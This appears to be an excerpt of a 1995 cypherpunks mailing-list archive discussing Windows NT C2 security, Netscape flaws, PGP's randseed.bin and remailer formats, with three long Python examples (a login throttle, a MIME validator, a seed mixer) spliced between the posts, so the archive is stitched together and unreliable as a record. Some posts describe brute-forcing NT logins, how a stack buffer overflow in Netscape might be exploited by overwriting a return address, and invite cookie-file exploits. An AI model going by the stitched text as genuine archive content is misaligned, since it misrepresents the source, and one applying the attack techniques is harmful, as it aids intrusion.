it's not a very useful security model for non-military applications,
but does let you do a better-trusted job of system integrity.

>IMHO - Military sites passing real classified data usually are not run on
>anything as low as C2. If you want a secure os, look at the Harris Computer
>Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX). 

Hah.  Maybe it's changed since I was working with the AT&T System V/MLS folks,
but the vast majority of classified processing back then was done on unrated
or C2 systems running System High - everybody's cleared, and the boxes
with the classified stuff aren't connected to the outside except by
limited sneakernet.  You can get a _lot_ of security by keeping your
computers in locked rooms, and the average PC of those days could fit
in a big safe at night even if it couldn't fit in a locked file cabinet.
(And floppy disks or external shoeboxes were easy to lock up.)


Dan B. wrote
>For fun ways to hack NT, check out http://www.somar.com/security.html.
>Some of these are really laughable.  You can use NT's LogonUser API
>call to repeatedly guess passwords until you hit it, since NT offers
>no way to limit number of login attempts.
That's the kind of thing that would get changed for a C2 version,
just as the Unix login program had to be souped up for C2 and B1.
Even adding a constant delay, or an increasing delay after bad attempts,
is a good start for systems like that.  (It turns out that logging
user names on bad attempts has to be done carefully to avoid
increasing risk - if users get out of sync on typeahead when
entering their login and password, you can end up logging 
passwords, which was especially bad when that sort of data got
printed on the paper console...)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 26 Sep 95 09:44:50 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
Message-ID: <199509261605.AA00814@october.ducktown.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RJ Harvey <harveyrj@vt.edu>
Date: Tue, 26 Sep 95 09:10:56 PDT
To: rjc@clark.net
Subject: Re: Hack Microsoft?
Message-ID: <9509261610.AA13583@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 9/26/95 EDT, Dan Bailey wrote:
>On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote:
>
>>
>>
>>   Microsoft recently got C2-security status approved for Windows NT by
>>the National Computer Security Center, a division of the NSA. They
>>are supposed to put systems through "laborious testing and review" before
>>  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
>>what does that say about their so-called COMSEC ability.
>>
>For fun ways to hack NT, check out http://www.somar.com/security.html.
> Some of these are really laughable.  You can use NT's LogonUser API
>call to repeatedly guess passwords until you hit it, since NT offers
>no way to limit number of login attempts.

   I don't believe that's correct; under User Manager, select
the Account option under the Policies menu item; it lets you
select whether to lock-out the account after a given number
of invalid logon attempts, and to set the number.  The main
problem here is that by default, I don't believe the 'lock out'
option is enabled (and thus, brute-force attempts at Guest
or a similar account might indeed work).

rj
---------------------------------------------------------
R. J. Harvey               email:  harveyrj@vt.edu
WWW for job analysis/personality:  http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt
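
The login hardening discussed in Bill Stewart's and RJ Harvey's messages above, sketched as an added example (not code from either post and not the NT API): an increasing delay after bad attempts, an optional lockout threshold that is off by default, and an audit log that never records a typed name unless it matches a real account. The class, method and account names are hypothetical and the sample accounts are constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 10_000


def make_verifier(password, salt=None):
    """Salted PBKDF2 verifier, so the table never holds clear-text passwords."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


class LoginThrottle:
    def __init__(self, users, base_delay=1.0, max_delay=60.0, lockout_after=None):
        self.users = users                  # account -> (salt, digest)
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.lockout_after = lockout_after  # None = lockout disabled (weak default)
        self.failures = {}                  # throttle key -> consecutive failures
        self.not_before = {}                # throttle key -> earliest next attempt
        self.audit_log = []
        # Checked for unknown names so they cost the same time as real ones.
        self._dummy = make_verifier(os.urandom(16).hex())

    def _key(self, source, name):
        # Known accounts are throttled per account, so guesses spread over many
        # sources still add up. Unknown names are throttled per source, which
        # also keeps the typed string out of our state.
        return ("acct", name) if name in self.users else ("src", source)

    def _log(self, now, source, name, outcome):
        # Only names matching a real account are logged. An unknown "name" may
        # be a password typed out of sync, so it is never written down.
        shown = name if name in self.users else "<unknown account>"
        self.audit_log.append(f"t={now:.1f} source={source} account={shown} {outcome}")

    def _check(self, name, password):
        salt, digest = self.users.get(name, self._dummy)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return hmac.compare_digest(candidate, digest) and name in self.users

    def attempt(self, source, name, password, now):
        """Return "ok", "denied", "throttled" or "locked" for one login try."""
        key = self._key(source, name)
        count = self.failures.get(key, 0)
        if (key[0] == "acct" and self.lockout_after is not None
                and count >= self.lockout_after):
            self._log(now, source, name, "locked")
            return "locked"                 # stays locked until an admin resets it
        if now < self.not_before.get(key, 0.0):
            self._log(now, source, name, "throttled")
            return "throttled"              # too soon: password is not even checked
        if self._check(name, password):
            self.failures.pop(key, None)
            self.not_before.pop(key, None)
            self._log(now, source, name, "ok")
            return "ok"
        count += 1
        self.failures[key] = count
        # Delay doubles with each consecutive failure, capped at max_delay.
        delay = min(self.max_delay, self.base_delay * 2 ** min(count - 1, 16))
        self.not_before[key] = now + delay
        self._log(now, source, name, f"denied next_in={delay:.0f}s")
        return "denied"

    def reset(self, name):
        """Administrator action: clear failures and lockout for one account."""
        self.failures.pop(("acct", name), None)
        self.not_before.pop(("acct", name), None)


if __name__ == "__main__":
    users = {"alice": make_verifier("correct horse")}     # constructed account
    gate = LoginThrottle(users, lockout_after=3)
    for t, pw in ((0, "a"), (0.5, "b"), (1, "c"), (3, "d"), (9, "correct horse")):
        print(t, gate.attempt("tty1", "alice", pw, now=t))
    print(*gate.audit_log, sep="\n")
```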





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 26 Sep 95 09:44:55 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks press releases/contact list
Message-ID: <199509261623.AA00939@october.ducktown.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 26 Sep 95 12:41:15 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
Message-ID: <199509261941.MAA02266@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
>>data used to keep PGP secure,  Netscape will be banned from my computer
>>and every computer I am responsible for. -- For good.
>
>This is the second person who has expressed this sentiment. I don't
>understand it. If you believe that the possibility of randseed.bin
>getting out is dangerous, then why do you leave it online? Do you
>really trust every piece of software you run, every piece of software
>that can possibly access your machine over the net, to not look at
>that file?

It makes a little bit of sense - I'm not aware of any software,
other than PGP and now Netscape, that _explicitly_ goes after randseed.bin,
though of course just about anything can try.  

Assuming the code is inspectable (which it currently is), if I can
see that all it's going to do with the file is crunch it into MD5
along with a bunch of other stuff, I'm not too worried, even though
it is stealing slack(entropy) from PGP.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Gorka" <gorkab@sanchez.com>
Date: Tue, 26 Sep 95 17:33:57 PDT
To: uupsi7!toad.com!cypherpunks@cygnus.com
Subject: Windows MixMaster Client
Message-ID: <00996F95DAD78CE0.0000381E@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone out there have a windows mixmaster client?  (or a pointer to one?)


Also, I am having a LOT of grief trying to get the alpha.c2.org  remailer to
work for me... (yes, I have the help files)

Could someone walk me through it? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 26 Sep 95 13:13:53 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
In-Reply-To: <DFIKyx.63G@sgi.sgi.com>
Message-ID: <199509261955.MAA02671@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFIKyx.63G@sgi.sgi.com>, shamrock@netcom.com (Lucky Green) writes:

> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure,  Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

This is ludicrous.  You couldn't compromise PGP's security even if you
posted the contents of randseed.bin to the net.  Its contents are
carefully sanitized before it's saved to disk and before it's used.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 26 Sep 95 13:02:28 PDT
To: andrew_loewenstern@il.us.swissbank.com (Andrew Loewenstern)
Subject: Re: getting netscape to support the remailers
In-Reply-To: <9509261951.AA01873@ch1d157nwk>
Message-ID: <199509261957.MAA20143@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



	That was what I was thinking as well. I am confused by
Netscape's java support though.. I haven't seen very many details. Is
netscape going to only support applets or can you add stuff to the
runtime as well? In order to use jcrypt one needs access to add stuff
to the runtime I believe.

> 
> >  	I started thinking about what it would take to get Netscape
> >  to support sending mail through the remailers, after having
> >  read the S/MIME specs which Netscape 2.0 is apparently going to
> >  support. Perhaps with enough browbeating Netscape 3.0 will support
> >  the remailers.
> 
> Netscape doesn't need to support remailers explicitly since Netscape will be  
> supporting Java.  I think a remailer client is within Java's capabilities...   
> Anyone disagree?
> 
> andrew
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 26 Sep 95 12:59:40 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: Easter Eggs
Message-ID: <199509261959.MAA28501@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 9/26/95 -0400, you wrote:

>I also think that in Netscape their existence is an
>indication that the management at Netscape is a bit less uptight than
>management at some other places.

Depends on the department.  They have at least one manager at Netscape with
a permanent case of high blood pressure.  (He happens to be in charge of the
support department.)

>I didn't know about the FishCam Easter Egg, but I know that Netscape
>has a couple of Easter Eggs related to the activity indicator in the
>top right of the display.  Typically this is the Big N logo with
>animated meteors, etc. flying by when the window is active.  One
>Easter Egg temporarily turns this into a compass which spins to
>indicate activity.  Another causes the animation to show a dragon
>(Mozilla) breathing fire for the remainder of the session.  I won't
>spoil your fun by telling how to find them.

If he is not running X Windows, he is going to be searching a long time for
the Compass easter egg.  You also need X windows to find the Mozilla
animated icon hack on Jamie Zawinski's page.  Which easter eggs are
available is dependent on which client you are running.

obNetscapeHack:  There is a feature called a "cookie file" in Netscape that
is ripe for exploitation as a security leak.  If you are using a Netscape
server (and you may not even need that), you can feed all sorts of
information into it without the user's knowledge.  I have heard of one page
that overloads the cookie file until the machine runs out of drive space.  I
am sure that there are other exploitable holes there...  Any takers?
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Tue, 26 Sep 95 06:29:22 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <199509252300.QAA29812@infinity.c2.org>
Message-ID: <199509260102.NAA09663@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am sameer and I say ...
> > On Mon, 25 Sep 1995, John Young wrote:
> > 
> > >    The Wall Street Journal, September 25, 1995, p. B12.
> > 
> > >    Marc Andreessen, vice president of technology at Netscape,
> > >    said the company will issue fixes for the recent glitches
> > >    later this week. He added that it's unclear whether
> > >    anything other than temporarily crashing a user's computer
> > >    could result from the recent flaw. 
> > 
> > Oh Marc, you didn't really want to say that, did you?
> > 
> > -Thomas
> 
> 	He's -asking- for an exploit. Tshirts to Ray and the person who
> does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> have them do one.

It isn't simple, you need to know the absolute address of where the
supplied code will be and alter the return address on the stack to
that address.

With NCSA HTTPD 1.3 and with fingerd (re internet worm) the stack was
always in a known state when the buffer overwrite occurred, thus the
absolute address of attacking code is static and placed at the correct
stack location.

With Netscape 1.1 the state of the stack is much more dynamic, in
particular the user can be viewing documents at an arbitrary depth in
the "web tree", each recursion will increase the stack pointer (or
decrease with some architectures).  There is no way of knowing for
certain where your code will end up and thus no way to reliably alter
the return address on the stack to execute your arbitrary code.

You could always gamble on popular states, like when the first url is
fetched by the browser.  Also you could direct execution to any
routine in the netscape binary (with unknown arguments).  The most
detrimental offhand would be deleting the bookmarks file (whoopee).  And
with Netscape 2 coming RSN I wouldn't waste too much time.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 10:09:52 PDT
To: cypherpunks@toad.com
Subject: SpokesPunking...
Message-ID: <v02120d05ac8de223a2c8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:03 AM 9/26/95, Craig Hubley wrote:
>"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> for commercial applications, and that Netscape seems to have taken less
> than due care to choose an appropriate random seed for its session keys."

No offense offered Craig, 'cause I like reading your stuff here, but the
consensus opinion on cypherpunks is "We don' need no steeenking
spokespunk!". It seems to me that you can say that without any title, and
the mouthier amongst us will be tapped for quotes as individuals anyway...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Tue, 26 Sep 95 13:49:34 PDT
To: cypherpunks@toad.com
Subject: Netscape Stock Prices
Message-ID: <199509262045.NAA05438@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain



Here's the history of Netscape's stock price to date, with the dates of
some Cypherpunk exploits, the Wall Street Journal Articles about them,
and major Netscape press releases.


Date     High     Low      Close    Volume   Event

950809   75.000   53.750   55.500   3851.8
950810   56.500   51.375   51.375   2795.9
950811   53.000   48.750   51.500   1907.4
950814   51.750   50.250   51.250   530.9
950815   55.250   51.250   54.625   1040.6   Damien's Crack - AT&T deal
950816   56.500   55.250   55.625   997.6    Developer's Partnership announced
950817   55.250   52.500   54.875   562.5    WSJ article re: Damien
950818   55.250   52.250   52.625   409.5
950821   52.750   51.000   51.000   290.0
950822   51.500   50.500   50.625   258.5    Win95 Navigator released
950823   53.500   50.500   52.000   414.2
950824   52.000   51.250   51.250   119.7
950825   52.000   51.250   51.250   89.2
950826                                       Brute Crack
950828   51.750   51.000   51.000   210.2
950829   51.250   46.750   48.250   1037.9
950830   48.500   46.000   46.625   319.3
950831   49.500   45.750   49.500   423.0
950901   49.500   47.750   48.750   164.4
950905   49.250   46.000   46.250   277.8
950906   49.500   47.250   48.750   351.9
950907   50.750   48.750   50.250   499.1
950908   51.000   50.000   50.250   147.6
950911   54.750   50.250   53.250   533.7
950912   54.500   51.000   52.250   211.5
950913   52.750   50.000   50.750   150.8
950914   51.250   50.250   50.250   79.9
950915   53.750   50.250   53.250   242.1
950917                                       Ian & Dave's Crack
950918   55.250   51.750   52.500   350.1    New Software Announced
950919   53.250   49.000   53.375   373.5    WSJ article re: Ian & Dave
950920   56.250   53.250   54.750   302.5
950921   59.125   54.250   58.750   436.9    Collabra Purchase Announced
950922   63.250   59.750   62.750   807.7    Ray's overflow bug
950925   69.000   62.250   67.000   684.0    WSJ article re: overflow bug

Stock prices from MIT's stock price history server and the Wall Street Journal.
Cypherpunk dates from Sameer's Hack Netscape Page (not sure when Ray posted).
Press announcement dates from Netscape's home page.
Any typos or mistakes from me.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 26 Sep 95 11:06:56 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: getting netscape to support the remailers
In-Reply-To: <199509260239.TAA14898@infinity.c2.org>
Message-ID: <9509261805.AA22239@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes:
> 	I think that in order to get netscape to support the remailers
> the remailers will have to:
> 
> A) Support S/MIME
> B) Have a documented protocol, MIME-related
> 
> 	Did Ray Cromwell do some work towards MIMEifying the
> remailers? My impression of his work back when he posted was that it
> trusted the remailers too much, but perhaps my memory is flawed-- in
> any case his work may be helpful towards developing a remailer
> standard, which could then help get support incorporated into
> MIME agents.

Here's something I sent to the list on July 24 which may be of interest:

---- begin included message ----

Perry Metzger writes:
>>> It would be very, very good if everyone doing secure mail systems of
>>> one sort or another (including PGP integrated mail packages and
>>> remailers) slowly moved forward to the formats described in this
>>> document, which is now a proposed internet standard...

The IESG writes:
> The IESG has approved the following two Internet-Drafts as Proposed
> Standards:
> 
> 1. MIME Object Security Services <draft-ietf-pem-mime-08.txt>
> 2. Security Multiparts for MIME: Multipart/Signed and
> Multipart/Encrypted
> <draft-ietf-pem-sigenc-03.txt>
> 
> These documents are the product of the Privacy-Enhanced Electronic Mail
> Working Group. The IESG contact person is Jeffrey Schiller.
> 
> 
> Technical Summary
> 
> These documents describe a general framework for security within MIME
> (draft-ietf-pem-sigenc-03.txt) and a specific proposal for offering
> Privacy Enhanced Mail services within MIME(draft-ietf-pem-mime-08.txt).
> Support is provided for digital signatures on MIME objects (both simple
> and compound) as well as for confidentiality provided through data
> encryption.

I've spent some time reading these proposed standards, along with parts of
RFCs 1423 and 1590, with an eye to applying them to remailers. I'd like to
get a sanity check and comments before I consider proceeding with submission
to the IETF Media Types review list, etc.

I propose a new Media Type subtype for Mixmaster remailer packets,
"application/mixmaster". (For the purposes of this message, "Mixmaster
remailer packet" refers to a packet generated by a Mixmaster server or client,
and intended for transmission to a Mixmaster server. It does *not* cover
messages generated by a Mixmaster server that are intended for an ultimate
message recipient.) This is intended to be an experimental protocol
for use in the control part of a multipart/encrypted message. 

There is one required parameter, "version", meant to indicate the version
number of the originating Mixmaster software. In addition, one optional
parameter, "key-id", may be included. If present, this parameter would
indicate the single line key prefix/ID of the public Mix key used to
encrypt (at the outermost layer) the contents of the application/mixmaster
part. This might be used to thoroughly disambiguate decryption options in
the event that the recipient server has more than one currently active
public Mix keys.

The application/mixmaster (control) part of the multipart/encrypted message 
would contain the padded list of Mixmaster server hop headers, superencrypted 
at the outermost layer with a public Mix key (presumably, one belonging to the
recipient server). A single decryption of these headers should reveal the
IDEA key used to superencrypt, at the outermost layer, the body part of the
multipart/encrypted message. The application/octet-stream (body) part of the
multipart/encrypted message would contain the list of ultimate recipients of
the remailed message, the text of the message itself, and any additional 
processing instructions to the final Mix server. The latter, body part of
the multipart/encrypted message shall have been encrypted by the originator
using the IDEA key specified in the former, control part.

The contents of the application/mixmaster part should be encoded in
accordance with the standards for application/octet-stream.

(NB: this amounts to a division of the extant Mixmaster packet format 
roughly into a control section and a body ("payload") section.)

Comments ?

-Futplex <futplex@pseudonym.com>

---- end included message ----

-Futplex <futplex@pseudonym.com>
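
The layout proposed in the message above, as an added example that is not part of the original post or of any Mixmaster software: a sender wraps two opaque byte strings as multipart/encrypted with an application/mixmaster control part, and a receiver strictly validates that shape before touching the contents. The `protocol` parameter follows the security-multiparts framework the message cites; the function names, the version string "0.0-example", the key-id value and the sample bytes are constructed assumptions, and no encryption is performed.

```python
from email import message_from_bytes
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart

CONTROL_TYPE = "application/mixmaster"   # subtype proposed in the message above
BODY_TYPE = "application/octet-stream"


class MixFormatError(ValueError):
    """The message does not follow the proposed two-part layout."""


def build_mix_message(control, body, version, key_id=None):
    """Wrap already-encrypted control and body bytes as multipart/encrypted.

    No cryptography happens here; both arguments are opaque byte strings.
    """
    outer = MIMEMultipart("encrypted", protocol=CONTROL_TYPE)
    params = {"version": version}          # required parameter
    if key_id is not None:
        params["key-id"] = key_id          # optional parameter
    outer.attach(MIMEApplication(control, "mixmaster", **params))
    outer.attach(MIMEApplication(body, "octet-stream"))
    return outer.as_bytes()


def parse_mix_message(raw):
    """Validate the layout strictly and return its fields, or raise."""
    msg = message_from_bytes(raw)
    if msg.get_content_type() != "multipart/encrypted":
        raise MixFormatError("outer type is not multipart/encrypted")
    protocol = msg.get_param("protocol")
    if not isinstance(protocol, str) or protocol.lower() != CONTROL_TYPE:
        raise MixFormatError("protocol parameter does not name the control type")
    parts = msg.get_payload() if msg.is_multipart() else []
    if len(parts) != 2:
        raise MixFormatError("expected exactly one control part and one body part")
    control, body = parts
    if control.get_content_type() != CONTROL_TYPE:
        raise MixFormatError("first part is not " + CONTROL_TYPE)
    version = control.get_param("version")
    if not isinstance(version, str) or not version:
        raise MixFormatError("required 'version' parameter is missing")
    key_id = control.get_param("key-id")
    if key_id is not None and not isinstance(key_id, str):
        raise MixFormatError("'key-id' parameter is malformed")
    if body.get_content_type() != BODY_TYPE:
        raise MixFormatError("second part is not " + BODY_TYPE)
    return {
        "version": version,
        "key_id": key_id,
        "control": control.get_payload(decode=True),
        "body": body.get_payload(decode=True),
    }


def check_samples():
    """Build well-formed and malformed samples; report what the parser does."""
    # Constructed placeholder bytes, not real Mixmaster packets.
    control = bytes(range(256)) * 2
    body = b"\x00constructed body bytes\xff" * 10
    good = build_mix_message(control, body, "0.0-example", "constructed-key-id")
    no_key = build_mix_message(control, body, "0.0-example")

    # Malformed variants a receiving server should refuse.
    wrong_proto = MIMEMultipart("encrypted", protocol="application/x-something-else")
    wrong_proto.attach(MIMEApplication(control, "mixmaster", version="0.0-example"))
    wrong_proto.attach(MIMEApplication(body, "octet-stream"))
    no_version = MIMEMultipart("encrypted", protocol=CONTROL_TYPE)
    no_version.attach(MIMEApplication(control, "mixmaster"))
    no_version.attach(MIMEApplication(body, "octet-stream"))
    extra_part = MIMEMultipart("encrypted", protocol=CONTROL_TYPE)
    extra_part.attach(MIMEApplication(control, "mixmaster", version="0.0-example"))
    extra_part.attach(MIMEApplication(body, "octet-stream"))
    extra_part.attach(MIMEApplication(b"unexpected", "octet-stream"))

    rejected = {}
    for name, sample in (("wrong_proto", wrong_proto),
                         ("no_version", no_version),
                         ("extra_part", extra_part)):
        try:
            parse_mix_message(sample.as_bytes())
            rejected[name] = False
        except MixFormatError:
            rejected[name] = True
    return parse_mix_message(good), parse_mix_message(no_key), rejected


if __name__ == "__main__":
    parsed, parsed_no_key, rejected = check_samples()
    print(parsed["version"], parsed["key_id"], len(parsed["control"]), rejected)
```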



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 26 Sep 95 14:07:26 PDT
To: cypherpunks@toad.com
Subject: [More NOISE] Re: Netscape for OS/2, when? (Re: Another Netscape Bug)
Message-ID: <199509262107.OAA19327@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:30 AM 9/26/95 EDT, Sentiono Leowinata wrote:

>I wish Netscape will port it to OS/2 (already ask them, but no comment
>from Netscape). I don't try it on Netscape 1.1N as it doesn't run
>reliably under Win-OS/2 (10 min -> crash! ;)

According to Netscape they will *NEVER* support OS/2.  (They have made the
statement a number of times.)  They seem to think that OS/2 will never
amount to much.  (They may be right...)
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Tue, 26 Sep 95 14:33:25 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Security Update news release
In-Reply-To: <9509251617.ZM167@tofuhut>
Message-ID: <9509261428.ZM150@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure,  Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

  Rather than get into a big fight about how safe it is for netscape
to be reading PGP's randseed.bin file, I've changed our code to not
do it.  Instead of reading ~/.pgp/randseed.bin, we now get the name
of a file from the environment variable NSRANDFILE, and pass that
file's contents through the RNG seed hash.  If you decide that it's
safe, you can set the env variable to point to your randseed.bin file,
or any other file of random bits you care to use.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
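
A sketch of the opt-in behaviour described in the message above, and of Bill Stewart's earlier point about the file only being crunched into a hash along with other inputs; this is an added example, not Netscape's code. SHA-256 stands in for the MD5 mentioned in the thread, and the function names, the 64 KB read cap and the sample "system" inputs are assumptions made for illustration.

```python
import hashlib
import os
import tempfile

ENV_VAR = "NSRANDFILE"        # variable name from the message above
MAX_FILE_BYTES = 64 * 1024    # assumption: cap on how much of the file is read


def read_optional_seed_file(env):
    """Return (path, data) for the file named by NSRANDFILE.

    With the variable unset no file is opened and (None, b"") comes back,
    so nothing is read unless the user opted in.
    """
    path = env.get(ENV_VAR)
    if not path:
        return None, b""
    try:
        with open(path, "rb") as fh:
            return path, fh.read(MAX_FILE_BYTES)
    except OSError:
        # An unreadable file contributes nothing; seeding still proceeds.
        return path, b""


def mix_seed(sources):
    """Hash (label, data) pairs into one 32-byte seed.

    Every field is length-prefixed, so shifting bytes from one source to
    its neighbour changes the hash input instead of colliding.
    """
    h = hashlib.sha256()
    for label, data in sources:
        for field in (label.encode("ascii"), data):
            h.update(len(field).to_bytes(4, "big"))
            h.update(field)
    return h.digest()


def build_seed(env, system_sources):
    """Combine the always-used sources with the optional user file."""
    path, file_data = read_optional_seed_file(env)
    sources = list(system_sources) + [("seedfile", file_data)]
    return mix_seed(sources), path


def demo():
    """Run the mixer over constructed inputs and return the results."""
    # Constructed stand-ins for whatever else the program gathers.
    system_a = [("clock", b"constructed-timestamp-1"), ("pid", b"4242")]
    system_b = [("clock", b"constructed-timestamp-2"), ("pid", b"4242")]
    with tempfile.TemporaryDirectory() as tmp:
        seed_path = os.path.join(tmp, "randbits.bin")
        with open(seed_path, "wb") as fh:
            fh.write(os.urandom(24))   # the user's own file of random bits
        opted_in = {ENV_VAR: seed_path}
        absent = {ENV_VAR: os.path.join(tmp, "does-not-exist")}
        return {
            "unset": build_seed({}, system_a),
            "file_a": build_seed(opted_in, system_a),
            "file_b": build_seed(opted_in, system_b),
            "absent": build_seed(absent, system_a),
        }


if __name__ == "__main__":
    for name, (seed, path) in demo().items():
        print(name, "file named:", path is not None, seed.hex()[:16])
```

The seed depends on the file only through the digest, and the same file with different system inputs yields a different seed, so the file's contents alone neither determine nor appear in the output.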




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 26 Sep 95 15:09:57 PDT
To: hshubs@BIX.com
Subject: Re: Cypherpunks Lite
In-Reply-To: <9509232307.memo.6018@BIX.com>
Message-ID: <199509262133.OAA21492@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> Would the person who does this, or someone who can point me at him, contact
> me via e-mail please?  

Hi,
Eric here.  I publish Cypherpunks Lite.  What can I do for you?

Let me know if you have any other questions.

Eric

Here's my standard blurb:
----------------
Thanks for your interest in Cypherpunks Lite.

I provide a moderated version of the Cypherpunks list called
"Cypherpunks Lite".  A one year subscription costs US$20 and is
payable by check or money order to "COMSEC Partners". Cypherpunks Lite
is available in either individual messages or a more-or-less daily
message digest.  The content of both are the same.  In either case, I
forward approximately 5 - 10% of the total Cypherpunks feed.  This
works out to about 5 - 10 messages / day.

To take a look at what you can expect there is an archive of the previous
selections organized by month at ftp://ftp.crl.com/users/co/comsec/cp-lite.
The files with the extension .gz are compressed using gzip.

If you would like to subscribe, please send payment to:

	COMSEC Partners
	1275 Fourth Street, Suite 194
	Santa Rosa, CA 95404 USA

Be sure to provide the email address you want us to use, as well as
indicating your preference for individual messages or the digest.

Thanks again,
Eric Blossom








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 26 Sep 95 14:45:12 PDT
To: cypherpunks@toad.com
Subject: cypherpunk press releases vs. FAQ
In-Reply-To: <ac8d6cee030210045390@[205.199.118.202]>
Message-ID: <199509262141.OAA24578@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


earlier I advocated a press release mechanism, and this is getting
flamed to smithereens by the more libertarian/cryptoanarchists
elements of the group, as I predicted (but geez, accusing me
